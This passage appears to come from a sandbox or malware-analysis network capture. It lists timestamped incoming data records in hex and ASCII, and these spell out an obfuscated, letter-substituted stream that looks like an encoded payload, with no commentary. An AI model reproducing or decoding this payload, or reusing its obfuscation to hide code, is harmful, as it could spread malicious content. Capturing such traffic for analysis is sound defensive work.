2021-10-29 18:50:18 UTC	2245	IN	Data Raw: 20 4f 59 51 20 6f 45 6f 20 4f 6b 6f 20 4f 52 4f 20 6f 45 6f 20 4f 6b 6f 20 4f 74 74 20 6f 45 6f 20 4f 6b 45 20 4f 52 6f 20 6f 45 6f 20 4f 6b 6f 20 4f 59 6b 20 6f 45 6f 20 4f 6b 6f 20 4f 52 78 20 6f 45 6f 20 4f 6b 6f 20 4f 59 74 20 6f 45 6f 20 4f 6b 6f 20 4f 52 78 20 6f 45 6f 20 4f 6b 45 20 4f 4b 4b 20 6f 45 6f 20 4f 6b 6f 20 4f 59 51 20 6f 45 6f 20 4f 6b 45 20 4f 4b 59 20 6f 45 6f 20 4f 6b 45 20 4f 4b 51 20 6f 45 6f 20 4f 6b 6f 20 4f 52 45 20 78 20 6f 45 52 20 4f 6b 4f 20 4f 74 59 20 6f 45 52 20 4f 6b 4f 20 4f 6b 6f 20 6f 45 52 20 4f 6b 6f 20 4f 59 51 20 6f 45 52 20 4f 6b 6f 20 4f 74 6b 20 6f 45 52 20 4f 6b 6f 20 4f 59 51 20 6f 45 52 20 4f 6b 6f 20 4f 52 78 20 6f 45 52 20 4f 6b 4f 20 4f 6b 6f 20 6f 45 52 20 4f 6b 6f 20 4f 52 45 20 6f 45 52 20 4f 6b 4f 20 Data Ascii: OYQ oEo Oko ORO oEo Oko Ott oEo OkE ORo oEo Oko OYk oEo Oko ORx oEo Oko OYt oEo Oko ORx oEo OkE OKK oEo Oko OYQ oEo OkE OKY oEo OkE OKQ oEo Oko ORE x oER OkO OtY oER OkO Oko oER Oko OYQ oER Oko Otk oER Oko OYQ oER Oko ORx oER OkO Oko oER Oko ORE oER OkO
2021-10-29 18:50:18 UTC	2261	IN	Data Raw: 59 74 20 6f 45 6b 20 4f 52 6f 20 4f 52 4f 20 6f 45 6b 20 4f 52 6f 20 4f 74 74 20 6f 45 6b 20 4f 52 6f 20 4f 6f 51 20 6f 45 6b 20 4f 52 6f 20 4f 74 4f 20 6f 45 6b 20 4f 52 6f 20 4f 52 78 20 6f 45 6b 20 4f 52 6f 20 4f 52 51 20 6f 45 6b 20 4f 52 6f 20 4f 52 4f 20 6f 45 6b 20 4f 52 6f 20 4f 74 6f 20 6f 45 6b 20 4f 52 4f 20 4f 74 52 20 6f 45 6b 20 4f 52 4f 20 4f 6b 6b 20 6f 45 6b 20 4f 52 4f 20 4f 74 74 20 6f 45 6b 20 4f 52 6f 20 4f 74 45 20 78 20 6f 45 78 20 4f 52 52 20 4f 74 51 20 6f 45 78 20 4f 52 59 20 4f 74 6b 20 6f 45 78 20 4f 52 59 20 4f 74 4f 20 6f 45 78 20 4f 52 52 20 4f 4b 59 20 6f 45 78 20 4f 52 59 20 4f 74 45 20 6f 45 78 20 4f 52 52 20 4f 74 4f 20 6f 45 78 20 4f 52 59 20 4f 74 74 20 6f 45 78 20 4f 52 52 20 4f 59 74 20 6f 45 78 20 4f 52 59 20 4f 52 Data Ascii: Yt oEk ORo ORO oEk ORo Ott oEk ORo OoQ oEk ORo OtO oEk ORo ORx oEk ORo ORQ oEk ORo ORO oEk ORo Oto oEk ORO OtR oEk ORO Okk oEk ORO Ott oEk ORo OtE x oEx ORR OtQ oEx ORY Otk oEx ORY OtO oEx ORR OKY oEx ORY OtE oEx ORR OtO oEx ORY Ott oEx ORR OYt oEx ORY OR
2021-10-29 18:50:18 UTC	2277	IN	Data Raw: 45 4f 20 4f 45 78 20 4f 6f 51 20 6f 45 4f 20 4f 45 78 20 4f 6b 59 20 78 20 6f 45 6f 20 4f 45 4f 20 4f 6b 78 20 6f 45 6f 20 4f 45 4f 20 4f 6b 6f 20 6f 45 6f 20 4f 45 6f 20 4f 52 6b 20 6f 45 6f 20 4f 45 6f 20 4f 45 52 20 6f 45 6f 20 4f 45 4f 20 4f 74 6b 20 6f 45 6f 20 4f 45 4f 20 4f 6b 59 20 6f 45 6f 20 4f 45 4f 20 4f 74 51 20 6f 45 6f 20 4f 45 4f 20 4f 6b 78 20 6f 45 6f 20 4f 45 4f 20 4f 74 51 20 6f 45 6f 20 4f 45 4f 20 4f 6b 78 20 6f 45 6f 20 4f 45 6f 20 4f 45 59 20 6f 45 6f 20 4f 45 6f 20 4f 45 4b 20 6f 45 6f 20 4f 45 6f 20 4f 4b 6b 20 6f 45 6f 20 4f 45 4f 20 4f 74 6b 20 6f 45 6f 20 4f 45 4f 20 4f 6b 59 20 78 20 6f 45 51 20 4f 4b 78 20 4f 6b 59 20 6f 45 51 20 4f 4b 78 20 4f 6b 52 20 6f 45 51 20 4f 4b 4f 20 4f 52 51 20 6f 45 51 20 4f 4b 78 20 4f 6b 6f 20 Data Ascii: EO OEx OoQ oEO OEx OkY x oEo OEO Okx oEo OEO Oko oEo OEo ORk oEo OEo OER oEo OEO Otk oEo OEO OkY oEo OEO OtQ oEo OEO Okx oEo OEO OtQ oEo OEO Okx oEo OEo OEY oEo OEo OEK oEo OEo OKk oEo OEO Otk oEo OEO OkY x oEQ OKx OkY oEQ OKx OkR oEQ OKO ORQ oEQ OKx Oko
2021-10-29 18:50:18 UTC	2293	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
2021-10-29 18:50:18 UTC	2309	IN	Data Raw: 6b 4f 20 78 20 52 74 20 78 20 74 45 20 78 20 4f 4f 59 20 78 20 74 4f 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 52 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6f 20 78 20 51 74 20 78 20 74 59 20 78 20 4f 6f 6f 20 78 20 74 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 52 20 78 20 4f 6f 6f 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 6b 4f 20 78 20 52 52 20 78 20 74 45 20 78 20 4f 4f 59 20 78 20 74 4f 20 78 20 51 74 20 78 20 4f 78 4b 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 4b 6b 20 78 20 74 74 20 78 20 6b 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 59 78 20 78 20 6b 78 20 78 20 74 4b 20 78 20 52 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 Data Ascii: kO x Rt x tE x OOY x tO x Qt x OxE x Rt x tk x OxR x OoO x RR x RQ x RY x RY x RR x ko x Qt x tY x Ooo x tx x kO x RY x Rt x tR x Ooo x OOk x Yt x kO x RR x tE x OOY x tO x Qt x OxK x Yt x OOO x Kk x tt x kR x RY x RY x tE x Yx x kx x tK x RQ x kO x RY x
2021-10-29 18:50:18 UTC	2325	IN	Data Raw: 51 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 51 51 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 6b 51 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 6b 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 74 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 45 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 6b 20 78 20 59 52 20 78 20 59 4b 20 78 20 74 59 20 78 20 6b 51 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 78 20 78 20 4f 4f 51 20 78 20 74 6f 20 78 20 6b 59 20 78 20 74 4b 20 78 20 4b 74 20 78 20 4f 6f 78 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 Data Ascii: Q x RY x Rt x RY x RY x RY x Kt x YO x kY x QQ x Kt x YO x kY x kQ x Kt x YO x kY x kY x Kt x YO x kY x kO x Kt x YO x kY x tt x Kt x YO x kY x tE x Kt x YO x kk x YR x YK x tY x kQ x to x RY x RY x Rt x tx x OOQ x to x kY x tK x Kt x Oox x kt x OOO x OOQ
2021-10-29 18:50:18 UTC	2341	IN	Data Raw: 6b 6f 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 20 52 52 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 59 4f 20 78 20 51 51 20 78 20 6b 4f 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 78 20 78 20 52 74 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 51 20 78 20 74 78 20 78 20 74 51 20 78 20 4f 4f 59 20 78 20 6b 4f 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 4b 6b 20 78 20 74 74 20 78 20 51 74 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 52 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 52 6b 20 78 20 4f 6f 4f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 4f 78 78 Data Ascii: ko x Oxk x Qk x OOO x OxY x OoO x OOY x RY x RY x tx x RR x kK x Kt x YO x QQ x kO x Qt x OxE x Rk x OOO x tx x Rt x RQ x RY x RY x tE x kx x RQ x tx x tQ x OOY x kO x OxY x YO x Kk x tt x Qt x tQ x OxR x RQ x kO x RY x Rt x Rk x OoO x kx x Kt x OOO x Oxx
2021-10-29 18:50:18 UTC	2357	IN	Data Raw: 20 52 6b 20 78 20 59 59 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 74 4b 20 78 20 4f 4f 45 20 78 20 4b 74 20 78 20 59 78 20 78 20 4f 78 45 20 78 20 74 74 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 45 20 78 20 4b 74 20 78 20 4f 6f 78 20 78 20 6b 74 20 78 20 6b 51 20 78 20 4f 4f 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 4b 74 20 78 20 52 74 20 78 20 74 78 20 78 20 59 74 20 78 20 4f 4f 78 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 74 6f 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 6b 52 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 Data Ascii: Rk x YY x Rt x OxK x kt x Qt x OxE x tK x OOE x Kt x Yx x OxE x tt x RQ x RY x RY x RY x Kt x YO x kY x tE x Kt x Oox x kt x kQ x OOQ x kY x RY x RY x OxY x Kt x Rt x tx x Yt x OOx x OOQ x OOY x OxK x Oxo x Yt x Kk x to x kt x OOO x RY x kR x OOk x Yt x
2021-10-29 18:50:18 UTC	2373	IN	Data Raw: 78 20 52 52 20 78 20 6b 52 20 78 20 4f 78 6f 20 78 20 59 74 20 78 20 59 78 20 78 20 52 51 20 78 20 6b 78 20 78 20 4b 74 20 78 20 6b 4b 20 78 20 51 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 4f 78 4b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4b 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 6f 6f 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 51 51 20 78 20 52 51 20 78 20 74 4b 20 78 20 74 51 20 78 20 4f 4f 4f 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 4f 78 4b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4b 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 Data Ascii: x RR x kR x Oxo x Yt x Yx x RQ x kx x Kt x kK x Qt x RY x tE x RQ x RY x RY x Rk x Kt x Oxx x OxK x Rk x Kt x KQ x KQ x Rk x OOO x Ooo x kk x RY x RY x RY x tt x QQ x RQ x tK x tQ x OOO x Rk x RY x RY x Rk x Kt x Oxx x OxK x Rk x Kt x KQ x KQ x Rk x OOO x
2021-10-29 18:50:18 UTC	2389	IN	Data Raw: 20 4b 51 20 78 20 74 78 20 78 20 4b 74 20 78 20 74 78 20 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 59 74 20 78 20 4f 4f 74 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 6f 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6b 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 4b 45 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 52 20 78 20 4f 78 6b 20 78 20 52 52 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 51 6b 20 78 20 6b 6b Data Ascii: KQ x tx x Kt x tx x RY x Ooo x Yt x OOt x OxE x OxE x Kt x OOk x Kt x Kt x OxK x QQ x RY x kx x OxK x Qx x kY x RY x RY x RY x RR x kk x OOk x Kt x Yo x to x RY x RY x RR x kk x OxR x kQ x kk x KE x Yt x Kt x Kt x Kt x kR x Oxk x RR x OxQ x OxY x Qk x kk
2021-10-29 18:50:18 UTC	2405	IN	Data Raw: 20 78 20 74 6f 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 4f 78 45 20 78 20 6b 6b 20 78 20 59 4f 20 78 20 4f 4f 51 20 78 20 59 4b 20 78 20 52 59 20 78 20 74 6b 20 78 20 59 78 20 78 20 51 74 20 78 20 6b 52 20 78 20 51 78 20 78 20 6b 6b 20 78 20 4f 4f 6b 20 78 20 59 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6b 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 59 20 78 20 74 78 20 78 20 74 51 20 78 20 74 6b 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 52 52 20 78 20 6b 4f 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 Data Ascii: x to x tx x OxQ x OxE x kk x YO x OOQ x YK x RY x tk x Yx x Qt x kR x Qx x kk x OOk x Yo x RY x RY x RY x RY x RR x kk x OxR x kQ x kk x OOQ x Kt x OOk x Kt x Kt x kY x tx x tQ x tk x ko x Oxo x RR x kO x Qt x OxE x tO x KE x RY x RY x kO x RY x RY x tx
2021-10-29 18:50:18 UTC	2421	IN	Data Raw: 4f 4f 20 78 20 4f 78 74 20 78 20 51 51 20 78 20 4f 78 4f 20 78 20 74 6f 20 78 20 6b 59 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 52 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 52 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 51 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 59 20 78 20 52 6b 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 45 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 59 6f 20 78 20 51 51 20 78 20 4f 78 59 20 78 20 6b 6b 20 78 20 59 6f 20 78 20 4f 4f 51 20 78 20 4f 78 52 20 78 20 6b 6b 20 78 20 6b 6b 20 78 20 6b 4f 20 78 20 59 4b 20 78 Data Ascii: OO x Oxt x QQ x OxO x to x kY x tx x OOt x tQ x OxR x RQ x kO x RY x Rt x tR x Oxx x kO x OxK x kO x OxY x YR x Qk x OOO x OOK x Kt x Ooo x Kt x Kt x KE x OOY x Rk x OxY x YO x kY x tE x OxY x YO x Yo x QQ x OxY x kk x Yo x OOQ x OxR x kk x kk x kO x YK x
2021-10-29 18:50:18 UTC	2437	IN	Data Raw: 74 20 78 20 6b 4f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 59 74 20 78 20 4f 78 4f 20 78 20 6b 74 20 78 20 59 6f 20 78 20 4f 4f 6b 20 78 20 4f 78 6b 20 78 20 6b 6b 20 78 20 51 51 20 78 20 74 6b 20 78 20 6b 52 20 78 20 4f 78 59 20 78 20 4b 45 20 78 20 4f 6f 4f 20 78 20 59 6f 20 78 20 52 52 20 78 20 52 74 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 4f 6f 6f 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 4b 45 20 78 Data Ascii: t x kO x kx x Kt x Kt x Kt x KQ x Yt x OxO x kt x Yo x OOk x Oxk x kk x QQ x tk x kR x OxY x KE x OoO x Yo x RR x Rt x tE x RY x RY x tQ x OxR x Kk x kY x OOQ x RY x RY x kR x Oxk x QQ x Ooo x Yt x OxQ x OxE x RY x tE x RY x RY x RY x OxR x kQ x kk x KE x
2021-10-29 18:50:18 UTC	2453	IN	Data Raw: 52 59 20 78 20 4b 74 20 78 20 59 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 59 74 20 78 20 4f 78 4f 20 78 20 6b 74 20 78 20 59 52 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 52 52 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 52 20 78 20 4f 78 59 20 78 20 4b 45 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 4f 78 6f 20 78 20 6b 4f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 4b 6b 20 78 20 74 74 20 78 20 4f 78 78 20 78 20 6b 45 20 78 20 74 51 20 78 20 74 52 20 78 20 6b 6f 20 78 20 6b 6f 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 52 6b 20 78 20 59 59 20 78 20 4f 78 78 20 78 20 74 4b 20 78 20 52 52 20 78 20 Data Ascii: RY x Kt x YY x Kt x Kt x KQ x Yt x OxO x kt x YR x OOx x Rt x RR x RY x RR x kR x OxY x KE x OoO x RR x Oxo x kO x OxE x RY x Rt x RY x RY x RY x OxY x Kk x Kk x tt x Oxx x kE x tQ x tR x ko x ko x RY x kx x OOR x Kk x RY x RQ x Rk x YY x Oxx x tK x RR x
2021-10-29 18:50:18 UTC	2469	IN	Data Raw: 52 20 78 20 4f 78 59 20 78 20 59 74 20 78 20 6b 4f 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 4b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 45 20 78 20 74 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 51 20 78 20 6b 4f 20 78 20 59 4b 20 78 20 4f 4f 51 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 51 51 20 78 20 59 78 20 78 20 52 74 20 78 20 74 52 20 78 20 52 51 20 78 20 6b 52 20 78 20 52 6b 20 78 20 4b 74 20 78 20 52 51 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 4f 78 59 20 78 20 4f 6f 78 20 78 20 6b 74 20 78 20 59 4b 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 78 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 4f 78 6b 20 78 20 51 78 Data Ascii: R x OxY x Yt x kO x Rt x RY x RY x RR x OOK x OOQ x RR x kE x tR x Oxx x RY x RQ x kO x YK x OOQ x OOK x Kt x QQ x Yx x Rt x tR x RQ x kR x Rk x Kt x RQ x OOO x OOk x OOQ x Qt x OxY x Oox x kt x YK x tx x OOY x KE x RY x RY x Rt x tx x OOQ x tx x Oxk x Qx
2021-10-29 18:50:18 UTC	2485	IN	Data Raw: 20 4b 74 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 59 20 78 20 6b 78 20 78 20 59 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 74 45 20 78 20 59 78 20 78 20 74 78 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 4f 20 78 20 51 74 20 78 20 52 52 20 78 20 52 6b 20 78 20 6b 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 59 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 4b 74 20 Data Ascii: Kt x OxR x kQ x kY x RY x Kt x kx x Kt x Kt x kY x kx x Yt x Ooo x Kt x tE x Yx x tx x RY x kx x OOK x Kt x Kt x KQ x Rt x tk x OxK x kO x Rk x KE x Kt x Kt x Yt x kO x Qt x RR x Rk x kE x kO x RY x Rt x tk x OxK x kO x RR x Yx x Kt x Kt x Yt x OOO x Kt
2021-10-29 18:50:18 UTC	2501	IN	Data Raw: 20 78 20 52 51 20 78 20 4f 4f 51 20 78 20 52 6b 20 78 20 52 6b 20 78 20 59 6f 20 78 20 6b 74 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 6b 59 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 51 20 78 20 74 78 20 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 4f 6f 4f 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 59 6f 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 4f 4f 6b 20 78 20 74 4f 20 78 20 4f 78 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 78 51 20 78 20 51 51 20 78 20 74 4b 20 78 20 74 59 20 78 20 6b 4f 20 78 20 74 74 20 78 20 52 59 20 Data Ascii: x RQ x OOQ x Rk x Rk x Yo x kt x Oxo x RY x RY x RY x RY x OxR x kY x kO x Oxt x RQ x tx x RY x Ooo x OoO x kt x OxY x Yo x KQ x kY x RY x RY x kO x kQ x OOk x tO x OxY x Qx x OOQ x Oxt x OOE x RY x OOQ x RY x RY x tE x OxQ x QQ x tK x tY x kO x tt x RY
2021-10-29 18:50:18 UTC	2517	IN	Data Raw: 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 6b 74 20 78 20 4f 4f 59 20 78 20 4f 6f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 52 6b 20 78 20 52 51 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 51 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 59 78 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 6b 74 20 78 20 4f 4f 59 20 78 20 4f 6f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 6b 4b 20 78 20 52 51 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 45 20 78 20 74 51 20 78 20 4f 4f 4f 20 78 20 4f 6f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 Data Ascii: x Kt x Ooo x kt x OOY x Oox x RQ x RQ x RY x OOO x YK x Rk x RQ x kO x kO x Rk x Kt x KQ x OxQ x OxK x QQ x Yx x RQ x RY x RY x Kt x Ooo x kt x OOY x Oox x RQ x RQ x RY x OOO x YK x kK x RQ x kO x kO x Rk x Kt x KQ x OOE x tQ x OOO x Oox x RQ x RQ x RY x
2021-10-29 18:50:18 UTC	2533	IN	Data Raw: 6b 20 78 20 59 74 20 78 20 4b 45 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 59 74 20 78 20 74 6f 20 78 20 59 6f 20 78 20 4f 78 6f 20 78 20 4f 78 59 20 78 20 4b 51 20 78 20 59 45 20 78 20 52 51 20 78 20 4f 78 52 20 78 20 6b 6b 20 78 20 4f 78 45 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 6b 20 78 20 59 6f 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4f 78 74 20 78 20 6b 51 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 52 6b 20 78 20 4b 74 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 78 59 20 78 20 74 52 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 78 45 20 78 20 59 59 20 78 20 6b 6f 20 78 20 4f 78 6f 20 Data Ascii: k x Yt x KE x tE x Oxk x tk x Yt x to x Yo x Oxo x OxY x KQ x YE x RQ x OxR x kk x OxE x OOO x OxY x Kk x kk x Yo x OxY x YR x Kt x OOO x kO x OOY x tR x Kt x Kt x Ooo x Oxt x kQ x Oxx x RQ x Rk x Kt x ko x Oxo x OxY x tR x ko x Oxo x OxE x YY x ko x Oxo
